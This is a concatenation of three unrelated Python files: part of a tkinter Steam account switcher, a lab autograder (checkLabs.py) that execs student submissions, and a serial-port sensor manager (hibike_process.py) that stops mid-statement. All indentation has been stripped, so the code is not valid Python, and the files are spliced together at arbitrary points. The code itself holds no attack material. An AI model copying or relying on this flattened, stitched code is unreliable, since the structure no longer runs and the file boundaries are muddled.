x, y = self.get_window_pos()
importwindow = tk.Toplevel(self, bg='white')
importwindow.title(_("Import"))
importwindow.geometry(self.popup_geometry(280, 300))
importwindow.resizable(False, False)
importwindow.grab_set()
importwindow.focus()
importwindow.bind('<Escape>', lambda event: importwindow.destroy())
try:
importwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
bottomframe_imp = tk.Frame(importwindow, bg='white')
bottomframe_imp.pack(side='bottom')
import_label = tk.Label(importwindow, text=_('Select accounts to import.') + '\n' +
_("Added accounts don't show up."),
bg='white')
import_label.pack(side='top', padx=5, pady=5)
def close():
importwindow.destroy()
def disable_close():
pass
def onFrameConfigure(canvas):
'''Reset the scroll region to encompass the inner frame'''
canvas.configure(scrollregion=canvas.bbox("all"))
canvas = tk.Canvas(importwindow, borderwidth=0, highlightthickness=0, background='white')
check_frame = tk.Frame(canvas, bg='white')
scroll_bar = ttk.Scrollbar(importwindow, orient="vertical", command=canvas.yview,)
canvas.configure(yscrollcommand=scroll_bar.set)
scroll_bar.pack(side="right", fill="y")
canvas.pack(side="left", fill="both", expand=True)
canvas.create_window((4, 4), window=check_frame, anchor="nw")
check_frame.bind("<Configure>", lambda event,
canvas=canvas: onFrameConfigure(canvas))
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
if 'disabled' not in scroll_bar.state():
canvas.yview_scroll(int(-1*(event.delta/120)), "units")
canvas.bind("<MouseWheel>", _on_mousewheel)
checkbox_dict = {}
for index, username in enumerate(account_name):
if username not in accounts:
int_var = tk.IntVar()
checkbutton = ttk.Checkbutton(check_frame,
text=username + f' ({persona_name[index]})',
variable=int_var,
style='Import.TCheckbutton')
checkbutton.bind("<MouseWheel>", _on_mousewheel)
checkbutton.pack(side='top', padx=2, anchor='w')
checkbox_dict[username] = int_var
def import_user():
nonlocal acc_dict
dl_list = []
for key, value in checkbox_dict.items():
if value.get() == 1:
acc_dict[len(acc_dict)] = {'accountname': key}
dl_list.append(steamid_list[account_name.index(key)])
with open('accounts.yml', 'w') as acc:
yaml = YAML()
yaml.dump(acc_dict, acc)
if get_config('show_avatar') == 'true':
canvas.destroy()
import_label.destroy()
scroll_bar.destroy()
import_cancel['state'] = 'disabled'
import_ok['state'] = 'disabled'
importwindow.protocol("WM_DELETE_WINDOW", disable_close)
importwindow.focus()
tk.Label(importwindow, text=_('Please wait while downloading avatars...'), bg='white').pack(fill='both', expand=True)
self.update()
download_avatar(dl_list)
self.refresh()
close()
import_cancel = ttk.Button(bottomframe_imp,
text=_('Cancel'),
command=close,
width=9)
import_ok = ttk.Button(bottomframe_imp,
text=_('Import'),
command=import_user,
width=9)
import_cancel.pack(side='left', padx=5, pady=3)
import_ok.pack(side='left', padx=5, pady=3)
def orderwindow(self):
'''Open order change window'''
accounts = acc_getlist()
if not accounts:
msgbox.showinfo(_('No Accounts'),
_("There's no account added."))
return
x, y = self.get_window_pos()
orderwindow = tk.Toplevel(self, bg='white')
orderwindow.title("")
orderwindow.geometry(self.popup_geometry(224, 270))
orderwindow.resizable(False, False)
orderwindow.bind('<Escape>', lambda event: orderwindow.destroy())
try:
orderwindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
bottomframe = tk.Frame(orderwindow, bg='white')
bottomframe.pack(side='bottom', padx=3, pady=3)
labelframe = tk.Frame(orderwindow, bg='white')
labelframe.pack(side='bottom', padx=3)
orderwindow.grab_set()
orderwindow.focus()
lbframe = tk.Frame(orderwindow, bg='white')
scrollbar = ttk.Scrollbar(lbframe)
scrollbar.pack(side='right', fill='y')
lb = DragDropListbox(lbframe, width=35, height=20,
highlightthickness=0,
yscrollcommand=scrollbar.set,
bd=1,
relief='solid')
scrollbar["command"] = lb.yview
def _on_mousewheel(event):
'''Scroll window on mousewheel input'''
lb.yview_scroll(int(-1*(event.delta/120)), "units")
lb.bind("<MouseWheel>", _on_mousewheel)
lb.pack(side='left')
for i, v in enumerate(accounts):
lb.insert(i, v)
lb.select_set(0)
lbframe.pack(side='top', padx=3, pady=(3, 5), expand=True)
def down():
i = lb.curselection()[0]
if i == lb.size() - 1:
return
x = lb.get(i)
lb.delete(i)
lb.insert(i+1, x)
lb.select_set(i+1)
def up():
i = lb.curselection()[0]
if i == 0:
return
x = lb.get(i)
lb.delete(i)
lb.insert(i-1, x)
lb.select_set(i-1)
def apply():
acc_dict = acc_getdict()
order = lb.get(0, tk.END)
print('New order is', order)
buffer_dict = {}
for item in acc_dict.items():
i = order.index(item[1]['accountname'])
buffer_dict[i] = item[1]
dump_dict = {}
for x in range(len(buffer_dict)):
dump_dict[x] = buffer_dict[x]
with open('accounts.yml', 'w') as acc:
yaml = YAML()
yaml.dump(dump_dict, acc)
self.refresh()
def close():
orderwindow.destroy()
def ok():
apply()
close()
button_ok = ttk.Button(bottomframe,
width=9, text=_('OK'), command=ok)
button_ok.pack(side='left', padx=(0, 1))
button_cancel = ttk.Button(bottomframe,
width=9, text=_('Cancel'), command=close)
button_cancel.pack(side='left', padx=(1, 1.5))
button_up = ttk.Button(bottomframe, width=3,
text='↑', command=up)
button_up.pack(side='right', padx=(1.5, 1))
button_down = ttk.Button(bottomframe, width=3,
text='↓', command=down)
button_down.pack(side='right', padx=(1, 0))
def settingswindow(self):
'''Open settings window'''
global image1
global image2
global image3
global image4
config_dict = get_config('all')
last_config = config_dict
if LOCALE == 'fr_FR':
width = 330
ui_padx = 70
theme_padx = 50
else:
width = 260
ui_padx = 35
theme_padx = 40
settingswindow = tk.Toplevel(self, bg='white')
settingswindow.title(_("Settings"))
settingswindow.geometry(self.popup_geometry(width, 430)) # 260 is original
settingswindow.resizable(False, False)
settingswindow.bind('<Escape>', lambda event: settingswindow.destroy())
try:
settingswindow.iconbitmap('asset/icon.ico')
except tk.TclError:
pass
bottomframe_set = tk.Frame(settingswindow, bg='white')
bottomframe_set.pack(side='bottom')
settingswindow.grab_set()
settingswindow.focus()
if LOCALE == 'fr_FR':
padx_int = 45
elif LOCALE == 'en_US':
padx_int = 11
else:
padx_int = 24
localeframe = tk.Frame(settingswindow, bg='white')
localeframe.pack(side='top', pady=(14, 7), fill='x')
locale_label = tk.Label(localeframe, text=_('Language'), bg='white')
locale_label.pack(side='left', padx=(padx_int, 13))
locale_cb = ttk.Combobox(localeframe,
state="readonly",
values=['English', # 0
'한국어 (Korean)', # 1
'Français (French)']) # 2
current_locale = config_dict['locale']
if current_locale == 'en_US':
locale_cb.current(0)
elif current_locale == 'ko_KR':
locale_cb.current(1)
elif current_locale == 'fr_FR':
locale_cb.current(2)
locale_cb.pack(side='left')
restart_frame = tk.Frame(settingswindow, bg='white')
restart_frame.pack(side='top')
s = ttk.Style()
s.configure('Settings.TRadiobutton', background='white')
s.configure('Settings.TCheckbutton', background='white')
ui_frame = tk.Frame(settingswindow, bg='white')
ui_frame.pack(side='top', pady=(5, 5), fill='x')
ui_radio_var = tk.IntVar()
list_radio_frame = tk.Frame(ui_frame, bg='white')
list_radio_frame.pack(side='left', padx=(ui_padx, 0))
list_canvas = tk.Canvas(list_radio_frame, width=30, height=30, bg='white', bd=0, highlightthickness=0)
list_img = Image.open("asset/list.png").resize((30, 30))
image1 = ImageTk.PhotoImage(list_img)
list_canvas.create_image(15, 15, image=image1)
list_canvas.pack(side='top', padx=0, pady=5)
radio_list = ttk.Radiobutton(list_radio_frame,
text=_('List Mode'),
variable=ui_radio_var,
value=0,
style='Settings.TRadiobutton')
radio_list.pack(side='top', pady=2)
ToolTipWindow(radio_list, _('Display accounts in vertical list.'), center=True)
grid_radio_frame = tk.Frame(ui_frame, bg='white')
grid_radio_frame.pack(side='right', padx=(0, ui_padx))
grid_canvas = tk.Canvas(grid_radio_frame, width=30, height=30, bg='white', bd=0, highlightthickness=0)
grid_img = Image.open("asset/grid.png").resize((30, 30))
image2 = ImageTk.PhotoImage(grid_img)
grid_canvas.create_image(15, 15, image=image2)
grid_canvas.pack(side='top', padx=0, pady=5)
radio_grid = ttk.Radiobutton(grid_radio_frame,
text=_('Grid Mode'),
variable=ui_radio_var,
value=1,
style='Settings.TRadiobutton')
radio_grid.pack(side='top', pady=2)
ToolTipWindow(radio_grid, _('Display accounts in 3 x n grid.'), center=True)
if get_config('ui_mode') == 'grid':
ui_radio_var.set(1)
avatar_frame = tk.Frame(settingswindow, bg='white')
avatar_frame.pack(fill='x', side='top', padx=12, pady=(2, 5))
avatar_chkb = ttk.Checkbutton(avatar_frame, style='Settings.TCheckbutton',
text=_('Show avatar images'))
avatar_chkb.state(['!alternate'])
if config_dict['show_avatar'] == 'true':
avatar_chkb.state(['selected'])
else:
avatar_chkb.state(['!selected'])
avatar_chkb.pack(side='top')
def on_list_check():
avatar_chkb.state(['!disabled'])
def on_grid_check():
avatar_chkb.state(['selected'])
avatar_chkb.state(['disabled'])
if ui_radio_var.get() == 1:
on_grid_check()
radio_list['command'] = on_list_check
radio_grid['command'] = on_grid_check
theme_frame = tk.Frame(settingswindow, bg='white')
theme_frame.pack(side='top', pady=(5, 5), fill='x')
theme_radio_var = tk.IntVar()
light_radio_frame = tk.Frame(theme_frame, bg='white')
light_radio_frame.pack(side='left', padx=(theme_padx, 0))
light_canvas = tk.Canvas(light_radio_frame, width=40, height=64, bg='white', bd=0, highlightthickness=0)
light_img = Image.open("asset/light.png").resize((40, 64))
image3 = ImageTk.PhotoImage(light_img)
light_canvas.create_image(20, 32, image=image3)
light_canvas.pack(side='top', padx=0, pady=5)
radio_light = ttk.Radiobutton(light_radio_frame,
text=_('Light Theme'),
variable=theme_radio_var,
value=0,
style='Settings.TRadiobutton')
radio_light.pack(side='top', pady=2)
dark_radio_frame = tk.Frame(theme_frame, bg='white')
dark_radio_frame.pack(side='right', padx=(0, theme_padx))
dark_canvas = tk.Canvas(dark_radio_frame, width=40, height=64, bg='white', bd=0, highlightthickness=0)
dark_img = Image.open("asset/dark.png").resize((40, 64))
image4 = ImageTk.PhotoImage(dark_img)
dark_canvas.create_image(20, 32, image=image4)
dark_canvas.pack(side='top', padx=0, pady=5)
radio_dark = ttk.Radiobutton(dark_radio_frame,
text=_('Dark Theme'),
variable=theme_radio_var,
value=1,
style='Settings.TRadiobutton')
radio_dark.pack(side='top', pady=2)
ToolTipWindow(radio_dark, _('Dark theme is applied only to main window.'), center=True)
if get_config('theme') == 'dark':
theme_radio_var.set(1)
mode_radio_frame1 = tk.Frame(settingswindow, bg='white')
mode_radio_frame1.pack(side='top', padx=12, pady=(7, 2), fill='x')
mode_radio_frame2 = tk.Frame(settingswindow, bg='white')
mode_radio_frame2.pack(side='top', padx=12, pady=(2, 7), fill='x')
mode_radio_var = tk.IntVar()
radio_normal = ttk.Radiobutton(mode_radio_frame1,
text=_('Normal Mode (Manually restart Steam)'),
variable=mode_radio_var,
value=0,
style='Settings.TRadiobutton')
radio_normal.pack(side='left', pady=2)
ToolTipWindow(radio_normal, _("Restart Steam by clicking on 'Restart Steam' button."))
radio_express = ttk.Radiobutton(mode_radio_frame2,
text=_('Express Mode (Auto-restart Steam)'),
variable=mode_radio_var,
value=1,
style='Settings.TRadiobutton')
radio_express.pack(side='left', pady=2)
ToolTipWindow(radio_express, _("Automatically restart Steam when autologin account is changed."))
if get_config('mode') == 'express':
mode_radio_var.set(1)
softshutdwn_frame = tk.Frame(settingswindow, bg='white')
softshutdwn_frame.pack(fill='x', side='top', padx=12, pady=(7, 5))
soft_chkb = ttk.Checkbutton(softshutdwn_frame, style='Settings.TCheckbutton',
text=_('Try to soft shutdown Steam client'))
soft_chkb.state(['!alternate'])
if config_dict['try_soft_shutdown'] == 'true':
soft_chkb.state(['selected'])
else:
soft_chkb.state(['!selected'])
soft_chkb.pack(side='left')
autoexit_frame = tk.Frame(settingswindow, bg='white')
autoexit_frame.pack(fill='x', side='top', padx=12, pady=(5, 0))
autoexit_chkb = ttk.Checkbutton(autoexit_frame, style='Settings.TCheckbutton',
text=_('Exit app after Steam is restarted'))
autoexit_chkb.state(['!alternate'])
if config_dict['autoexit'] == 'true':
autoexit_chkb.state(['selected'])
else:
autoexit_chkb.state(['!selected'])
autoexit_chkb.pack(side='left')
def close():
settingswindow.destroy()
def apply():
nonlocal config_dict
nonlocal current_locale
'''Write new config values to config.txt'''
locale = ('en_US', 'ko_KR', 'fr_FR')
if ui_radio_var.get() == 1:
ui_mode = 'grid'
else:
ui_mode = 'list'
if theme_radio_var.get() == 1:
theme = 'dark'
else:
theme = 'light'
if mode_radio_var.get() == 1:
mode = 'express'
else:
mode = 'normal'
if 'selected' in soft_chkb.state():
soft_shutdown = 'true'
else:
soft_shutdown = 'false'
if 'selected' in autoexit_chkb.state():
autoexit = 'true'
else:
autoexit = 'false'
if 'selected' in avatar_chkb.state():
avatar = 'true'
else:
avatar = 'false'
config_dict = {'locale': locale[locale_cb.current()],
'autoexit': autoexit,
'mode': mode,
'try_soft_shutdown': soft_shutdown,
'show_avatar': avatar,
'last_pos': get_config('last_pos'),
'steam_path': get_config('steam_path'),
'ui_mode': ui_mode,
'theme': theme}
config_write_dict(config_dict)
if last_config['show_avatar'] == 'false' and 'selected' in avatar_chkb.state():
if msgbox.askyesno('', _('Do you want to download avatar images now?')):
self.update_avatar(no_ui=True)
if current_locale != locale[locale_cb.current()]:
self.after(100, lambda: msgbox.showinfo(_('Locale has been changed'),
_('Restart app to apply new locale settings.')))
current_locale = locale[locale_cb.current()]
self.refresh()
def ok():
apply()
close()
settings_ok = ttk.Button(bottomframe_set,
text=_('OK'),
command=ok,
width=10)
settings_cancel = ttk.Button(bottomframe_set,
text=_('Cancel'),
command=close,
width=10)
settings_apply = ttk.Button(bottomframe_set,
text=_('Apply'),
command=apply,
width=10)
settings_ok.pack(side='left', padx=3, pady=3)
settings_cancel.pack(side='left', padx=3, pady=3)
settings_apply.pack(side='left', padx=3, pady=3)
def exit_after_restart(self, refresh_override=False, silent=True):
'''Restart Steam client and exit application.
If autoexit is disabled, app won't exit.'''
label_var = tk.StringVar()
def forcequit():
print('Hard shutdown mode')
subprocess.run("TASKKILL /F /IM Steam.exe",
creationflags=0x08000000, check=True)
print('TASKKILL command sent.')
self.no_user_frame.destroy()
self.button_frame.destroy()
hide_update()
self.bottomframe.pack_forget()
button_frame = tk.Frame(self, bg=self['bg'])
button_frame.pack(side='bottom', fill='x')
cancel_button = SimpleButton(button_frame,
text=_('Cancel'))
force_button = SimpleButton(button_frame,
text=_('Force quit Steam'),
command=forcequit)
cancel_button.disable(no_fade=True)
force_button.disable(no_fade=True)
def enable_button():
cancel_button.enable()
force_button.enable()
cancel_button.pack(side='bottom', padx=3, pady=3, fill='x')
force_button.pack(side='bottom', padx=3, fill='x')
label_var = tk.StringVar()
label_var.set(_('Initializing...'))
label = tk.Label(self, textvariable=label_var, bg=self['bg'], fg=get_color('text'))
label.pack(pady=(150, 0))
def cleanup():
label.destroy()
button_frame.destroy()
self.refresh(no_frame=True)
self.bottomframe.pack(side='bottom', fill='x')
show_update()
self.update()
queue = q.Queue()
if steam_running():
label_var.set(_('Waiting for Steam to exit...'))
if get_config('try_soft_shutdown') == 'false':
forcequit()
elif get_config('try_soft_shutdown') == 'true':
print('Soft shutdown mode')
if get_config('steam_path') == 'reg':
r_path = fetch_reg('SteamExe')
r_path_items = r_path.split('/')
else:
r_path = get_config('steam_path') + '\\Steam.exe'
r_path_items = r_path.split('\\')
path_items = []
for item in r_path_items:
if ' ' in item:
path_items.append(f'"{item}"')
else:
path_items.append(item)
steam_exe = "\\".join(path_items)
print('Steam.exe path:', steam_exe)
subprocess.run(f"start {steam_exe} -shutdown", shell=True,
creationflags=0x08000000, check=True)
print('Shutdown command sent. Waiting for Steam...')
def steam_checker():
nonlocal queue
sleep(1)
while True:
if t.stopped():
break
if steam_running():
sleep(1)
continue
else:
queue.put(1)
break
def cancel():
t.stop()
cleanup()
return
t = StoppableThread(target=steam_checker)
t.start()
cancel_button.update_command(cancel)
else:
queue.put(1)
counter = 0
def launch_steam():
nonlocal queue
nonlocal counter
try:
queue.get_nowait()
label_var.set(_('Launching Steam...'))
self.update()
print('Launching Steam...')
subprocess.run("start steam://open/main",
shell=True, check=True)
if get_config('autoexit') == 'true':
self.exit_app()
elif not refresh_override:
cleanup()
except q.Empty:
counter += 1
if counter == 10:
enable_button()
self.after(1000, launch_steam)
self.after(2000, launch_steam)
|
checkLabs.py
|
import shutil
import os
import sys
import importlib
import unittest
import copy
from collections import defaultdict
from io import StringIO
import threading
import inspect
import ctypes
import argparse
class KillableThread(threading.Thread):
def _get_my_tid(self):
"""determines this (self's) thread id"""
if not self.isAlive():
raise threading.ThreadError("the thread is not active")
# do we have it cached?
if hasattr(self, "_thread_id"):
return self._thread_id
# no, look for it in the _active dict
for tid, tobj in threading._active.items():
if tobj is self:
self._thread_id = ctypes.c_long(tid)
return ctypes.c_long(tid)
raise AssertionError("could not determine the thread's id")
def raise_exc(self, exctype):
"""raises the given exception type in the context of this thread"""
if not inspect.isclass(exctype):
raise TypeError("Only types can be raised (not instances)")
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(self._get_my_tid(), ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(self._get_my_tid(), 0)
raise SystemError("PyThreadState_SetAsyncExc failed")
def terminate(self):
"""raises SystemExit in the context of the given thread, which should
cause the thread to exit silently (unless caught)"""
self.raise_exc(SystemExit)
class TimeoutException(Exception):
pass
def getArgs():
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--targetDirectory",
help="directory containing all the students' submissions from Blackboard.",
default="./"
)
parser.add_argument("-o", "--output",
help="the file to output results",
default="./output.txt"
)
parser.add_argument("-t", "--tester",
help="the tester file to use",
default=None
)
parser.add_argument("-to", "--timeout",
help="How much time to give each student",
type=int,
default=5
)
parser.add_argument("-v", "--verbosity",
action="count",
default=0,
help="increase output verbosity"
)
parser.add_argument("-s", "--seed",
type=int,
default=None,
help="Seed to use"
)
parser.add_argument("-tpt", "--timeoutPerTest",
action="count",
default=0,
help="If enabled we wait timeout per test instead of timeout per student (default)"
)
parser.add_argument("-p", "--plugins",
help="the plugins to use",
default=''
)
args = parser.parse_args()
return args
def files_list(directory):
info = os.walk(directory)
filenames = []
for (parent, b, filez) in info:
for file in filez:
if file != '__init__.py':
yield os.path.join(parent, file)
if '__init__.py' not in filez:
open('__init__.py', 'a').close()
def catchIO(function):
def wrapper(*args,**kwargs):
# Store the values of stdin/stdout/stderr
old_stdout = sys.stdout
old_stderr = sys.stderr
old_stdin = sys.stdin
# Set stdin/stdout/stderr to a StringIO
sys.stdout = mystdout = StringIO()
sys.stderr = mystderr = StringIO()
# Set the stdin just to speed things up
# Note that we can't kill the thread if waiting for input()...
sys.stdin = StringIO('A' * 100)
error = None
output = None
try:
output = function(*args,**kwargs)
except Exception as e:
error = e
finally:
# Restore the values of stdin/stdout/stderr
sys.stdout = old_stdout
sys.stderr = old_stderr
sys.stdin = old_stdin
stdoutput = mystdout.getvalue()
stderroutput = mystderr.getvalue()
return output, stdoutput, stderroutput, error
return wrapper
def runFile(studentFilename, tester, allFiles, stdinput='', plugins = [], **kwargs):
'''
Runs a student's file through the tester
Modifys allFiles and adds studentFilename to dict as a dict with keys:
'errors' - Number of tests that raised an error
'failures' - Number of tests with incorrect output
'numTests' - Number of tests in total
'passed' - Number of tests passed
'stdout' - The stdout of running the tests
'stderr' - The stderr of running the tests
'stdsuit'- Output by unittest
'grade' - The student's calculated grade on the scale 0.0-1.0 (multiply by 100 to get percentage)
each as tuples of length 2, the first is for required tests, the second for extra credit
If there is a class called TheHardcodingTestSuite it will run all the tests in there too (optional)
'''
try:
allFiles[studentFilename] = defaultdict(tuple)
allFiles[studentFilename]['grade'] = 0
for p in plugins:
catchIO(p.init)(allFiles[studentFilename])
#keys = {'errors':(),'failures':(),'numTests':(),'passed':(),'stdout':(),'stderr':(),'suitError':(),'grade':0}
# Create dict to store results
print(studentFilename)
try:
# execute the student's file and catch output, and errors
data = open(studentFilename).read()
output, stdoutput, stderroutput, error = catchIO(exec)(data, globals())
# Add student's code to local scope (it needs to be in tester)
addErrors = set()
for functName in tester.REQUIRED_DEFNS + tester.SUB_DEFNS + tester.EXTRA_CREDIT_DEFNS:
try:
exec('tester.{funct} = {funct}'.format(funct=functName))
except NameError:
print('Add Error: %s' % functName)
addErrors.add(functName)
# create an object that can run tests.
testout = StringIO()
runner = unittest.TextTestRunner(stream=testout)
# define the suite of tests that should be run.
suites = []
suites.append(tester.TheTestSuite(tester.REQUIRED_DEFNS + tester.SUB_DEFNS))
suites.append(tester.TheExtraCreditTestSuite(tester.EXTRA_CREDIT_DEFNS))
try:
suites.append(tester.TheHardcodingTestSuite(tester.REQUIRED_DEFNS + tester.SUB_DEFNS + tester.EXTRA_CREDIT_DEFNS))
except AttributeError:
pass
for suite in suites:
# let the runner run the suite of tests.
ans, stdoutput, stderroutput, error = catchIO(runner.run)(suite)
# store the results
allFiles[studentFilename]['errors'] += (len(ans.errors),)
allFiles[studentFilename]['failures'] += (len(ans.failures),)
allFiles[studentFilename]['numTests'] += (ans.testsRun,)
allFiles[studentFilename]['passed'] += (ans.testsRun - len(ans.errors) - len(ans.failures),)
allFiles[studentFilename]['stdout'] += (stdoutput,)
allFiles[studentFilename]['stderr'] += (stderroutput,)
allFiles[studentFilename]['stdsuit'] += (testout.getvalue(),)
testout.truncate(0)
testout.seek(0)
for p in plugins:
catchIO(p.run)(data, allFiles[studentFilename])
except (TimeoutException, AttributeError):
pass
try:
# Calculate the grade
passed = allFiles[studentFilename]['passed']
allFiles[studentFilename]['grade'] = passed[0]*tester.weight_required + passed[1]*tester.weight_extra_credit
except IndexError:
# Calculate the grade
passed = allFiles[studentFilename]['passed']
allFiles[studentFilename]['grade'] = passed[0]*tester.weight_required
except SystemExit:
pass
finally:
# Remove student's code from local scope
for functName in tester.REQUIRED_DEFNS + tester.SUB_DEFNS + tester.EXTRA_CREDIT_DEFNS:
try:
exec('del tester.{funct}'.format(funct=functName))
exec('del globals()["{funct}"]'.format(funct=functName))
#exec('del locals()[{funct}]'.format(funct=functName))
except AttributeError as e:
print('Delete Error: AttributeError: %s' % e)
except NameError as e:
print('Delete Error: NameError: %s' % e)
# Cleanup plugins
for p in plugins:
catchIO(p.cleanup)(allFiles[studentFilename])
def runFiles(directory, testerFilename, timeout=5, timeoutPerTest=False, verbose = False, seed = None, pluginNames = []):
'''
Run all the files in directory and all subfolders usind the given tester file
'''
# A dict from student files to a dict representing the result
files = {}
# Remove the extension and import the tester file
testerName = testerFilename.split('.')[0]
tester = importlib.import_module(testerName)
if seed is not None:
tester.SEED = seed
plugins = []
# Create a data dict to pass to the threads
data = {'studentFilename':None, 'tester':tester, 'allFiles':files, 'stdinput':'', 'plugins':plugins}
for pn in pluginNames:
pn = pn.split('.')[0]
plugin = importlib.import_module(pn)
plugins.append(plugin)
catchIO(plugin.start)(data, tester)
# Iterate over all of the students' files
for filename in files_list(directory):
if verbose: print('Running: %s' % (filename))
# Instantiate files[filename] to be an empty dict and add it to data
files[filename] = defaultdict(int)
data['studentFilename'] = filename
# Create and run a new thread
t = KillableThread(target=runFile, kwargs=data, daemon=True)
t.start()
# Wait for it to finish or for it to timeout
t.join(timeout=timeout)
# If the thread didn't finish, kill it
if t.isAlive():
if verbose: print('Timed out, killing thread')
while t.isAlive():
try:
t.raise_exc(TimeoutException)
if timeoutPerTest:
t.join(timeout=timeout)
else:
t.join(timeout=1)
except (threading.ThreadError, ValueError):
pass
if verbose: print('Thread killed')
if verbose: print('Finished All Test')
for plugin in plugins:
catchIO(plugin.end)(data)
return files
def printResults(fileResults, outputfile, sort=True, seperator='\t'):
# Sort (or don't sort) the results
if sort:
resultList = sorted(fileResults.items(), key=lambda x: x[0])
else:
resultList = fileResults.items()
# Set the format string to None, it will be updated on the first loop
formatStr = None
keys = []
with open(outputfile, 'w') as o:
for file, result in resultList:
# Copy the results to data
data = copy.deepcopy(result)
# Calculate filename, parent, and grandparent folders
parent, file = os.path.split(file)
gparent, lab = os.path.split(parent)
try:
# Try to parse the section, username and lab ID (or project ID) from the filename
data['section'], data['username'], data['labID'] = file.split('_')
data['labID'] = data['labID'].split('.')[0]
except ValueError:
# Parse error, just set the labID to the filename
data['labID'] = file
data['section'], data['username'] = None, None
# Split multiple results into individual keys in the data
for key, val in result.items():
try:
if not isinstance(val, str) and len(val) >= 2:
try:
del data[key]
except KeyError:
pass
# Apppend the first key with '-r' (required),
# the second with '-ec' (extra credit),
# and the others with their number
data['%s-r' % key] = val[0]
data['%s-ec' % key] = val[1]
for i in range(2, len(val)):
data['%s-%d' % (key, i)] = val[i]
except TypeError:
pass
# Set the format string to create a header row
if formatStr is None:
formatStr = ''
for key in data:
keys.append(key)
if key.startswith('std'):
formatStr += '{%s!r}%s' % (key, seperator)
else:
formatStr += '{%s}%s' % (key, seperator)
formatStr = formatStr[:-1] + '\n'
o.write(seperator.join(keys) + '\n')
# Add missing keys
for key in keys:
if key not in data:
data[key] = None
# Write the data to the file
o.write(formatStr.format(**data))
def main():
# Parse arguments
args = getArgs()
verbose_level = args.verbosity
verbose = verbose_level > 0
directory = args.targetDirectory
outputfile = args.output
testerFile = args.tester
timeout = args.timeout
seed = args.seed
timeoutPerTest = args.timeoutPerTest
pluginNames = args.plugins.split(',')
pluginNames = [x.strip() for x in pluginNames if x.strip()]
# Run the files
fileResults = runFiles(directory=directory, verbose=verbose, testerFilename=testerFile, timeout=timeout, timeoutPerTest=timeoutPerTest, seed=seed, pluginNames=pluginNames)
# Output results to a file
printResults(fileResults, outputfile)
print('Done!')
if __name__ == "__main__":
main()
|
hibike_process.py
|
"""
The main Hibike process.
"""
from collections import namedtuple
import glob
import multiprocessing
import os
import queue
import random
import threading
import time
import sys
#from PieCentral.runtime.runtimeUtil import *
# from runtimeUtil import *
# pylint: disable=import-error
import hibike_message as hm
import serial
__all__ = ["hibike_process"]
# .04 milliseconds sleep is the same frequency we subscribe to devices at
BATCH_SLEEP_TIME = .04
# Time in seconds to wait until reading from a potential sensor
IDENTIFY_TIMEOUT = 1
# Time in seconds to wait between checking for new devices
# and cleaning up old ones.
HOTPLUG_POLL_INTERVAL = 1
def get_working_serial_ports(excludes=()):
"""
Scan for open COM ports, except those in EXCLUDES.
Returns:
A list of serial port objects (`serial.Serial`) and port names.
"""
excludes = set(excludes)
# Last command is included so that it's compatible with OS X Sierra
# Note: If you are running OS X Sierra, do not access the directory through vagrant ssh
# Instead access it through Volumes/vagrant/PieCentral
ports = set(glob.glob("/dev/ttyACM*") + glob.glob("/dev/ttyUSB*")
+ glob.glob("/dev/tty.usbmodem*"))
ports.difference_update(excludes)
try:
virtual_device_config_file = os.path.join(os.path.dirname(__file__), "virtual_devices.txt")
ports.update(open(virtual_device_config_file, "r").read().split())
except IOError:
pass
serials = []
port_names = []
for port in ports:
try:
serials.append(serial.Serial(port, 115200))
port_names.append(port)
except serial.serialutil.SerialException:
print("Cannot Open Serial Port: " + str(port))
return serials, port_names
def identify_smart_sensors(serial_conns):
"""
Given a list of serial port connections, figure out which
contain smart sensors.
Returns:
A map of serial port names to UIDs.
"""
def recv_subscription_response(conn, uid_queue, stop_event):
"""
Place received subscription response UIDs from CONN into UID_QUEUE,
stopping when STOP_EVENT is set.
"""
try:
for packet in hm.blocking_read_generator(conn, stop_event):
msg_type = packet.get_message_id()
if msg_type == hm.MESSAGE_TYPES["SubscriptionResponse"]:
_, _, uid = hm.parse_subscription_response(packet)
uid_queue.put(uid)
except serial.SerialException:
pass
device_map = {}
candidates = []
for conn in serial_conns:
old_timeout = conn.write_timeout
conn.write_timeout = IDENTIFY_TIMEOUT
try:
hm.send(conn, hm.make_ping())
except serial.SerialTimeoutException:
continue
finally:
conn.write_timeout = old_timeout
maybe_device = namedtuple("MaybeDevice", ["serial_conn", "queue", "event", "thread"])
maybe_device.queue = queue.Queue()
maybe_device.event = threading.Event()
maybe_device.serial_conn = conn
maybe_device.thread = threading.Thread(target=recv_subscription_response,
args=(conn, maybe_device.queue, maybe_device.event))
candidates.append(maybe_device)
for cand in candidates:
cand.thread.start()
for cand in candidates:
try:
uid = cand.queue.get(block=True, timeout=IDENTIFY_TIMEOUT)
device_map[cand.serial_conn.name] = uid
# Shut device up
hm.send(cand.serial_conn, hm.make_subscription_request(uid, [], 0))
except queue.Empty:
pass
for cand in candidates:
cand.event.set()
cand.thread.join()
return device_map
def spin_up_device(serial_port, uid, state_queue, batched_data, error_queue):
"""
Spin up a device with a given UID on SERIAL_PORT.
Returns:
The new device.
"""
pack = namedtuple("Threadpack", ["read_thread", "write_thread",
"write_queue", "serial_port", "instance_id"])
pack.write_queue = queue.Queue()
pack.serial_port = serial_port
pack.write_thread = threading.Thread(target=device_write_thread,
args=(serial_port, pack.write_queue))
pack.read_thread = threading.Thread(target=device_read_thread,
args=(uid, pack, error_queue,
state_queue, batched_data))
# This is an ID that does not persist across disconnects,
# so that we can tell when a device has been reconnected.
pack.instance_id = random.getrandbits(128)
pack.write_thread.start()
pack.read_thread.start()
return pack
def hotplug(devices, state_queue, batched_data, error_queue):
"""
Remove disconnected devices and scan for new ones.
"""
clean_up_queue = queue.Queue()
clean_up_thread = threading.Thread(target=clean_up_devices, args=(clean_up_queue, ))
clean_up_thread.start()
while True:
time.sleep(HOTPLUG_POLL_INTERVAL)
scan_for_new_devices(devices, state_queue, batched_data, error_queue)
remove_disconnected_devices(error_queue, devices, clean_up_queue, state_queue)
def scan_for_new_devices(existing_devices, state_queue, batched_data, error_queue):
"""
Find devices that are on serial ports not in EXISTING_DEVICES, and add
any that have been found to it.
"""
ports, names = get_working_serial_ports(map(lambda d: d.serial_port.name,
